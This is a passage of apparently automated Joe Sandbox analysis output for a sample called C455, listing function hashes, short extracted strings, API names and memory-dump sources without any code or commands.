                                                                                                                                                                                                                                                                • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                • API String ID: 0-261129489
                                                                                                                                                                                                                                                                • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                • Instruction ID: f0878c0f4e6b90640118d36347c806bf9e6e7a715d824a71d7eba0bbf7764e43
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E1B17111D3C18AE7358F29C4607FABBD6AFD2304F1888ADC1C987292DB39454ACB26
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                • API String ID: 0-261129489
                                                                                                                                                                                                                                                                • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                • API String ID: 0-483502859
                                                                                                                                                                                                                                                                • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                • Instruction ID: 9de214833fe22390c35ca05358b13cc06f1c20276c207ba8adbc8e5155641e97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4A1B2B52017818FD728CF29C590A62BBF2FF96304B1995ADC5DA8F766D734E802CB50
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                • API String ID: 0-483502859
                                                                                                                                                                                                                                                                • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                • Instruction ID: 2aa6919072dba47b9270695e6991cc69ff0c1f6966d97f9deb27882b56acdda1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D81CF716007128FC728CF29C890666B7F2FF95750B1A859DC8C24FBA5EB38E841CB49
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                • API String ID: 0-936430989
                                                                                                                                                                                                                                                                • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                • Instruction ID: d3af3e92236a745decfbbe2c9e8033ce2c1ec59482db8d4ef15ec14884f40bd1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B82F7746083449FD7248F24E981B2FBBE2EBE6714F28892CE585872D2D771DC42DB46
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                                • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                                                • String ID: PT
                                                                                                                                                                                                                                                                • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                • Instruction ID: 892c9111ce94c521bf1a1febb066dc54bb71faeab81a89d41d1d10e7c0823c63
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0A1BEB46097818FD3268F29C4A0A62BFE1EF57300B19869CC5E24FB76D739D806CB15
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                                                • String ID: PT
                                                                                                                                                                                                                                                                • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: BE$de
                                                                                                                                                                                                                                                                • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                • Instruction ID: e94200b74e8a417b4f5815e679ba052d84524ab233434b6a79f828476795df97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19D128B164C3588BD328DF2888516BFFBE6ABC1304F18492CE9D59B395DA74C906C782
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: BE$de
                                                                                                                                                                                                                                                                • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$ihgf
                                                                                                                                                                                                                                                                • API String ID: 0-73152791
                                                                                                                                                                                                                                                                • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                • Instruction ID: ce647925ae45fb9e9e0dd8c027ed88576b0c0bfa8e1b2a68f0ab92baf40e059e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B4102B1A043219BD714CF28D85267BB7A2FFD2328F15863CE4959B291E7359909CBC2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: @$ihgf
                                                                                                                                                                                                                                                                • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Z\$^P
                                                                                                                                                                                                                                                                • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                • Instruction ID: 9a913c4ff872501d258d2759b5431873e733e25c77ebbcdf35c4131d46bbf4f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1641B1B1911A04CFC718CF24C892A63B7B2FF99314B1A855CD4968F7A5E738E811CF55
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AzB$`rB
                                                                                                                                                                                                                                                                • API String ID: 0-365317308
                                                                                                                                                                                                                                                                • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AzB$`rB
                                                                                                                                                                                                                                                                • API String ID: 0-365317308
                                                                                                                                                                                                                                                                • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: c$
                                                                                                                                                                                                                                                                • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: A67H
                                                                                                                                                                                                                                                                • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: [
                                                                                                                                                                                                                                                                • API String ID: 0-3878419350
                                                                                                                                                                                                                                                                • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                • Instruction ID: 2fd1bf05990d631ba587fd389ea0d49311f26da36ef97c77d6443b7f3cee7f27
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D021075600702CBCB24CF29C8D1663B7F2FF99714B19859CC4864FBA6EB39A852CB51
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
